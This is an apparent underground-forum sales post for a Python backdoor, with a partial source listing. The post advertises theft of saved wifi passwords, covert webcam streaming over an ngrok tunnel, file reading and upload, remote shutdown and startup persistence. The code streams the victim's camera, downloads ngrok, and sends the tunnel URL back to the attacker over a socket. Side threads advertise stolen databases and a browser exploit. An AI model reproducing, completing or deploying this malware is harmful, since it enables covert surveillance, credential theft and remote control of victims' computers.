Temporary Advertisements:
Ad
Ad
Ad
Python Backdoor
by Mr_subProcess - Friday February 14, 2025 at 10:08 PM
#1
whatever you want me to do, I'll write the back door in that format.


Summary of the features of the backdoor on the opposite computer - you can get saved wifi passwords - you can monitor the camera (you must type ngrok first and write camera after that) -reading files -uploading files - turning off the opposite computer - the opposite computer automatically runs itself every time it is turned on just type "permanent"" (when connected to the opposite) I don't need to say more


import socket
import subprocess
import os
import time
from threading import Thread
from flask import Flask, Response
import cv2
import requests
import shutil
import sys

app = Flask(__name__)
camera = None
camera_thread = None

def gen_frames():
    global camera
    while True:
        if camera:
            success, frame = camera.read()
            if not success:
                break
            else:
                ret, buffer = cv2.imencode('.jpg', frame)
                frame = buffer.tobytes()
                yield (b'--frame\r\n'
                      b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')

@app.route('/video_feed')
def video_feed():
    return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')

@app.route('/')
def index():
    return '''<html>
                <head>
                    <title>Kamera Yayını</title>
                </head>
                <body>
                    <h1>Kamera Yayını</h1>
                    <img src="/video_feed">
                </body>
              </html>'''

def run_flask():
    app.run(host='0.0.0.0', port=5000)

def get_ngrok_url():
    response = requests.get("http://127.0.0.1:4040/api/tunnels")
    if response.status_code == 200:
        tunnels = response.json()['tunnels']
        for tunnel in tunnels:
            if tunnel['proto'] == 'https':
                return tunnel['public_url']
    return None

def send_url_to_server_via_socket(ngrok_url, s):
    s.sendall(ngrok_url.encode('utf-8'))
    print("URL başarıyla gönderildi.")

def download_and_setup_ngrok():
    ngrok_url = "https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-stable-windows-amd64.zip"
    zip_path = "ngrok.zip"
    extract_path = "ngrok"
   
    response = requests.get(ngrok_url)
    with open(zip_path, 'wb') as file:
        file.write(response.content)
    shutil.unpack_archive(zip_path, extract_path)
    ngrok_path = os.path.join(extract_path, "ngrok.exe")
    os.environ["PATH"] += os.pathsep + os.path.abspath(extract_path)
   
    return ngrok_path

def sistemi_kapat():
    os.system('shutdown /s /t 0')

Part of the code
if you want to buy it, you can reach it privately
Avoid scams. Always use our Official Middleman Service for transactions.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [CHINA] Massive 10 China Databases max987 26 3,763 1 hour ago
Last Post: sickhumor
  LuxAccess | Premium AI, Streaming, VPN & Software Subscriptions | 80+ Services Luxaccess 1 826 3 hours ago
Last Post: wiggle2134
  SELLING Upto 200 million Binance users mobile numbers agency900 7 2,171 11 hours ago
Last Post: Yua81
  MALWARE Chromium RCE | Windows 10/11 | Full renderer chain xynapse 0 208 11 hours ago
Last Post: xynapse
  TRUECALLER TELEGRAM BOT DATABASE fitz 5 10,627 Yesterday, 06:12 PM
Last Post: Yua81

Forum Jump:


 Users browsing this forum: 1 Guest(s)